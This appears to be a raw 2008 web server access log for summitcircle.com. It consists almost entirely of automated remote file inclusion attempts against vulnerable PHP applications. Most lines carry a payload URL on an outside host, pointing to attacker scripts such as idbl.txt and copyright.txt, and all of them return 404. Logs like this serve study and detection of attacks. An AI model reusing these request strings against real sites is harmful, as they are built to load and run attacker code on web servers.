70.85.198.234 - - [30/Nov/2008:17:56:30 -0800] "GET /logs/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:30 -0800] "GET /sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:30 -0800] "GET /logs/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:56:31 -0800] "GET /logs/access_080804.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:56:31 -0800] "GET /sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:56:31 -0800] "GET /logs/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:31 -0800] "GET /logs/access_080804.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:31 -0800] "GET /sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:32 -0800] "GET /logs/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:33 -0800] "GET /logs/access_080629.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:37 -0800] "GET /logs/access_080629.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:17:56:37 -0800] "GET /logs/access_080629.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:17:56:39 -0800] "GET /logs/access_080629.log/sub.php?s=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:17:56:48 -0800] "GET /logs/access_080707.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:17:56:51 -0800] "GET /logs/access_080707.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:57:01 -0800] "GET /logs/kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:57:01 -0800] "GET /logs/access.log%20%20/kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
62.44.72.229 - - [30/Nov/2008:17:57:02 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.52.113.14 - - [30/Nov/2008:17:57:39 -0800] "GET /logs/access_080505.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
60.52.113.14 - - [30/Nov/2008:17:57:40 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
60.52.113.14 - - [30/Nov/2008:17:57:41 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:17:57:44 -0800] "GET /logs/access_080630.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:17:57:47 -0800] "GET /logs/access_080630.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
217.20.138.16 - - [30/Nov/2008:17:58:03 -0800] "GET /logs/access_080602.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.3.25.99 - - [30/Nov/2008:17:59:14 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
190.3.25.99 - - [30/Nov/2008:17:59:14 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
66.40.52.25 - - [30/Nov/2008:17:59:46 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
66.40.52.25 - - [30/Nov/2008:17:59:46 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
66.40.52.25 - - [30/Nov/2008:18:00:00 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
66.40.52.25 - - [30/Nov/2008:18:00:00 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:00:41 -0800] "GET /logs/access_080427.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:00:42 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:00:42 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:01:02 -0800] "GET /logs/access_080427.log/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:01:02 -0800] "GET /errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.155.18.50 - - [30/Nov/2008:18:01:03 -0800] "GET /logs/errors.php?error=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:01:09 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:01:09 -0800] "GET /logs/access_080630.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:01:58 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:01:58 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:01:58 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:01:58 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:02:00 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:02:00 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
65.55.208.15 - - [30/Nov/2008:18:02:45 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.15 - - [30/Nov/2008:18:02:45 -0800] "GET /logs/access_080609.log HTTP/1.1" 200 65536 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:02:48 -0800] "GET /logs/access_080505.log%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:02:48 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:02:48 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:02:59 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:02:59 -0800] "GET /logs/access_080630.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.12.200.23 - - [30/Nov/2008:18:03:08 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
216.12.200.23 - - [30/Nov/2008:18:03:08 -0800] "GET /logs/access_080505.log%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
216.12.200.23 - - [30/Nov/2008:18:03:09 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:03:15 -0800] "GET /logs/access_080630.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:03:42 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:03:42 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:03:42 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:03:53 -0800] "GET /logs/access_080825.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:55 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:55 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:55 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:55 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:55 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:56 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:57 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:58 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:03:59 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:00 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:00 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:00 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:00 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:01 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:01 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:04:01 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
94.23.0.108 - - [30/Nov/2008:18:04:01 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:02 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:03 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
70.85.198.234 - - [30/Nov/2008:18:04:03 -0800] "GET /logs/access_080629.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:18:04:14 -0800] "GET /logs/access_080505.log/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:18:04:14 -0800] "GET /sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.98.128.36 - - [30/Nov/2008:18:04:14 -0800] "GET /logs/sub.php?menu=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:04:35 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.239.45.154 - - [30/Nov/2008:18:04:35 -0800] "GET /logs/access.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:04:44 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:04:44 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
63.247.65.114 - - [30/Nov/2008:18:04:44 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:05:06 -0800] "GET /logs/access_080818.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:05:07 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:05:07 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:26 -0800] "GET /logs/access_080811.log//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:26 -0800] "GET /logs/access_080811.log//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:27 -0800] "GET /logs/access_080811.log//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:27 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:27 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:29 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.218.85.18 - - [30/Nov/2008:18:05:29 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.135.71.20 - - [30/Nov/2008:18:06:06 -0800] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
201.80.215.232 - - [30/Nov/2008:18:06:12 -0800] "GET /logs/access_080505.log/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
